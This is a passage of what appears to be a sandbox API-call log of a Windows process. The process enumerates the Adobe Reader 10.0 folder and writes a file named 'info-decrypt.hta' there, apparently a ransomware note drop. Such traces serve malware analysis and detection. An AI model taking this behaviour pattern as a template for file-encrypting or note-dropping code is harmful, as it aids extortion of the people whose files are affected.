dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0175.166] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0175.166] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0175.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed8c) returned 1 [0175.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed98) returned 1 [0175.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceedcc) returned 1 [0175.166] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0", nBufferLength=0x105, lpBuffer=0x6cee8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0", lpFilePart=0x0) returned 0x28 [0175.166] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", nBufferLength=0x105, lpBuffer=0x6cee8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpFilePart=0x0) returned 0x29 [0175.166] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x6ceeaf4 | out: lpFindFileData=0x6ceeaf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3f0 [0175.166] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0175.167] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0175.168] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0175.169] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0175.170] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0175.171] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 0 [0175.172] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0175.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed8c) returned 1 [0175.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed98) returned 1 [0175.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0175.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0175.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0175.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0175.172] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0175.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0175.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0175.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee72c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0175.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec20) returned 1 [0175.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x460 [0175.173] GetFileType (hFile=0x460) returned 0x1 [0175.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec1c) returned 1 [0175.173] GetFileType (hFile=0x460) returned 0x1 [0175.173] WriteFile (in: hFile=0x460, lpBuffer=0x3902494*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6ceece4, lpOverlapped=0x0 | out: lpBuffer=0x3902494*, lpNumberOfBytesWritten=0x6ceece4*=0x1000, lpOverlapped=0x0) returned 1 [0175.174] WriteFile (in: hFile=0x460, lpBuffer=0x3902494*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6ceecb8, lpOverlapped=0x0 | out: lpBuffer=0x3902494*, lpNumberOfBytesWritten=0x6ceecb8*=0x557, lpOverlapped=0x0) returned 1 [0175.175] CloseHandle (hObject=0x460) returned 1 [0175.175] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0175.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0175.175] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), fInfoLevelId=0x0, lpFileInformation=0x39034b0 | out: lpFileInformation=0x39034b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268)) returned 1 [0175.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0175.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: 